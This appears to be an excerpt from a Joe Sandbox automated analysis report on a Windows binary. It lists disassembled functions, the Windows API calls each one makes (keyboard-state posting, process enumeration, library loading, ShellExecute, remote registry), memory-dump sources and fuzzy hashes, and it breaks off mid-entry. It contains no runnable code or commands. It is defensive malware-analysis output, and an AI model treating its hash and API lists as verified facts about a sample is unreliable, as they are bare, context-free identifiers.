                                                                                                                            • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                            Function 0045377F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • _memset.LIBCMT ref: 004538C4
                                                                                                                            • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                            • _wcslen.LIBCMT ref: 00453960
                                                                                                                            • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default_memset_wcscpy
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 3530711334-4108050209
                                                                                                                            • Opcode ID: 1aa33fd9944876cb9fe496392d69df5a4ee613405bc69ac73b8ac36908c5d6e8
                                                                                                                            • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                            • Opcode Fuzzy Hash: 1aa33fd9944876cb9fe496392d69df5a4ee613405bc69ac73b8ac36908c5d6e8
                                                                                                                            • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                            Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 3488606520-2761332787
                                                                                                                            • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                            • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                            • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                            • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                            Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082120231-0
                                                                                                                            • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                            • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                            • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                            • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                                                                            Function 00447303 Relevance: 10.7, APIs: 7, Instructions: 192COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                            • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                            • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                            • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                            • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                            • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                            • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082120231-0
                                                                                                                            • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                            • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                                                                            • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                                                                            • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                                                                            Function 0044733D Relevance: 10.7, APIs: 7, Instructions: 177COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 288456094-0
                                                                                                                            • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                            • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                                                                            • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                                                                            • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                                                                            Function 0044496C Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 004449B0
                                                                                                                            • GetKeyboardState.USER32(?), ref: 004449C3
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00444A0F
                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00444A3F
                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00444A60
                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444AAC
                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444AD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                            • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                                                                            • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                                                                            • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                                                                            Function 00444B65 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32(?), ref: 00444BA9
                                                                                                                            • GetKeyboardState.USER32(?), ref: 00444BBC
                                                                                                                            • SetKeyboardState.USER32(?), ref: 00444C08
                                                                                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 00444C35
                                                                                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 00444C53
                                                                                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444C9C
                                                                                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444CBE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 87235514-0
                                                                                                                            • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                            • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                                                                            • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                                                                            • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                                                                            Function 004498BD Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                            • Instruction ID: b3b3da583a0ae8cfa3180eda0e634cae40a493ebdfd517dbec9d2fd4fbd82cb1
                                                                                                                            • Opcode Fuzzy Hash: 2552f041a71837ba3affbc4ec308d2b7aa0755a9e2dfe05148a880b05b5b76bf
                                                                                                                            • Instruction Fuzzy Hash: 1E513A315082909FE321CF14DC89FABBB64FB46320F18456FF895AB2D1D7649C06D7AA
                                                                                                                            Function 0046A98D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectRegistry_wcslen
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 535477410-2761332787
                                                                                                                            • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                            • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                                                                            • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                                                                            • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                                                                            Function 00457C08 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00457C34
                                                                                                                            • _memset.LIBCMT ref: 00457CE8
                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                            • String ID: <$@
                                                                                                                            • API String ID: 1325244542-1426351568
                                                                                                                            • Opcode ID: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                            • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                            • Opcode Fuzzy Hash: bce0cc86945754dfb230170ecd4c21a915d6526e7c9b1e7fd723952314da78dd
                                                                                                                            • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                            Function 0047375F Relevance: 10.6, APIs: 7, Instructions: 150processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000,00000014), ref: 0047379B
                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                                                                            • __wsplitpath.LIBCMT ref: 004737E1
                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                            • _wcscat.LIBCMT ref: 004737F6
                                                                                                                            • __wcsicoll.LIBCMT ref: 00473818
                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?), ref: 00473852
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2547909840-0
                                                                                                                            • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                            • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                            • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                            • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                            Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                            • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2354583917-0
                                                                                                                            • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                            • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                            • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                            • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                            Function 00463D7E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 2449869053-554117064
                                                                                                                            • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                            • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                            • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                            • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                            Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                            • GetMenu.USER32 ref: 004776AA
                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                            • _wcslen.LIBCMT ref: 0047771A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
